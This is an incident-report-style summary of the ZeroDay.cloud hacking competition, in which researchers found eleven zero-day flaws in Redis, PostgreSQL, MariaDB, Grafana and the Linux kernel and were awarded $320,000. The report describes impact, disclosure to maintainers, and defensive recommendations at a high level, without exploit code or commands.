Full Report
Hackers awarded $320,000 at first-of-its-kind cloud hacking competition
Analysis Summary
# Incident Report: Cloud Infrastructure Zero-Day Discovery Competition
## Executive Summary
This report summarizes findings from the first-of-its-kind cloud hacking competition, ZeroDay.cloud, hosted by Wiz Research in partnership with AWS, Microsoft, and Google Cloud. Over two days, elite researchers successfully demonstrated 11 critical zero-day vulnerabilities in foundational cloud technologies, earning $320,000 in rewards. The primary impact was proving the potential for comprehensive data compromise and container escape due to flaws in databases (Redis, PostgreSQL, MariaDB) and the Linux Kernel.
## Incident Details
- **Discovery Date:** December 2025 (Over two days of the competition dates)
- **Incident Date:** December 2025 (During the competition event)
- **Affected Organization:** Open-source cloud components, including Redis, PostgreSQL, MariaDB, and the Linux Kernel. (No single enterprise victim identified, as this was a controlled test.)
- **Sector:** Technology (Cloud Infrastructure, Databases, AI/ML Services)
- **Geography:** London (Location of the competition)
## Timeline of Events
The events occurred over a two-day competition structure.
### Initial Access
- **Date/Time:** Day 1 & Day 2 (Over two days)
- **Vector:** Exploitation of logic flaws and memory vulnerabilities within popular open-source cloud technologies. Targets included Redis, PostgreSQL, MariaDB, Grafana, and the Linux Kernel.
- **Details:** Researchers achieved authenticated Remote Code Execution (RCE) in several database instances. The most severe flaw targeted the Linux Kernel leading to a Container Escape.
### Lateral Movement
- **Vector:** Specific details on lateral movement post-exploit are limited, but successful RCE in core databases implies the ability to compromise applications built on them. The Linux Kernel exploit specifically enabled escaping isolation boundaries.
- **Details:** The Linux Kernel exploit allowed attackers to potentially spread from an isolated cloud service container to the underlying shared infrastructure managing all users (multi-tenant environment).
### Data Exfiltration/Impact
- **Impact:** Successful RCE in databases grants "keys to the kingdom"—unauthorized access to all underlying data, including user information, passwords, secrets, and sensitive PII. The Linux Kernel RCE demonstrated a breach of cloud isolation promises.
- **Failed Attempts:** Attempts to exploit vLLM and Ollama (AI/ML frameworks) to access private AI artifacts (models, datasets, prompts) were unsuccessful within the time limit.
### Detection & Response
- **Detection:** Vulnerabilities were discovered in real-time by the competing security researchers during the live hacking sessions.
- **Response actions taken:** Project maintainers and Wiz Research validated the reported vulnerabilities (prompt validation), leading to immediate reporting for patching by the respective open-source communities.
## Attack Methodology
*Note: As this was a controlled red-team exercise, the methodology reflects the techniques used by the researchers to *mimic* real-world attacks.*
- **Initial Access:** RCE via vulnerabilities in Database engines (Redis, PostgreSQL, MariaDB) and core OS (Linux Kernel). Specific entry required successful authentication for some RCEs (e.g., Grafana).
- **Persistence:** Not explicitly detailed, though RCE often allows for the establishment of persistent backdoors.
- **Privilege Escalation:** Achieved via the Linux Kernel exploit leading to **Container Escape**, breaking out of the single-user isolation boundary to the host infrastructure.
- **Defense Evasion:** Exploits successfully bypassed standard security measures during the live hacking sessions (85% success rate).
- **Credential Access:** Implied outcome of RCE in databases (access to secrets and passwords stored/accessible by the database process).
- **Discovery:** Unknown, assumed pre-competition reconnaissance was performed to identify targets running the vulnerable software versions.
- **Lateral Movement:** Confirmed capability for movement across tenants via the Linux Kernel exploit breaking container isolation.
- **Collection:** Successful on databases containing critical application data.
- **Exfiltration:** Implied, as RCE leads to data access, though the ultimate exfiltration step was not the focus of the reporting.
- **Impact:** Complete system compromise potential (RCE) and violation of cloud isolation guarantees (Container Escape).
## Impact Assessment
- **Financial:** $320,000 awarded in bug bounties. No direct enterprise financial loss reported as this was a controlled event.
- **Data Breach:** High potential. Successful database RCE grants access to sensitive PII, passwords, and secrets.
- **Operational:** Proven ability to disrupt the core operational promise of multi-tenant cloud environments (isolation).
- **Reputational:** Highlighted the risk associated with fundamental open-source cloud technology, reinforcing the need for speed in vulnerability management.
## Indicators of Compromise
*No specific malicious IOCs were generated as this was a controlled research event, but the successful vulnerability types serve as indicators of potential risk:*
- **Network indicators (Defanged):** Exploitation attempts targeting known zero-day paths/functions within Redis, PostgreSQL, MariaDB, or the Linux Kernel.
- **File indicators:** N/A (Focus was on memory corruption/logic flaws leading to execution).
- **Behavioral indicators:** Unauthorized remote execution commands originating from database or container processes; successful authentication followed immediately by high-privilege system calls.
## Response Actions
The primary response actions were immediate and collaborative, involving defenders and researchers:
- **Containment:** Vulnerabilities were disclosed responsibly to project maintainers and cloud partners (AWS, MSFT, GCP) for immediate remediation efforts.
- **Eradication:** Steps would involve patching the affected software versions (PostgreSQL, Redis, Linux Kernel, etc.).
- **Recovery:** N/A (No production systems were compromised).
## Lessons Learned
- **AI Acceleration:** AI is drastically increasing the speed at which zero-days can be discovered by both attackers and defenders, demanding a parallel increase in response urgency.
- **Core Component Risk:** Flaws in foundational, widely adopted open-source components (databases, OS kernel) represent the highest severity risks, potentially granting "keys to the kingdom."
- **Container Isolation Limits:** Containers alone are insufficient security barriers in multi-tenant cloud environments; further isolation layers are critical.
## Recommendations
- **Accelerated Patching Cadence:** Organizations must match the speed of vulnerability discovery by deploying patches for critical infrastructure components in hours, not weeks.
- **Layered Defense:** Implement security controls that assume container environments may be compromised (e.g., runtime protection, stronger network segmentation, cloud-native security posture management).
- **Focus on Foundational Tech:** Prioritize security review and vetting for open-source components used in core infrastructure (especially databases and underlying operating systems).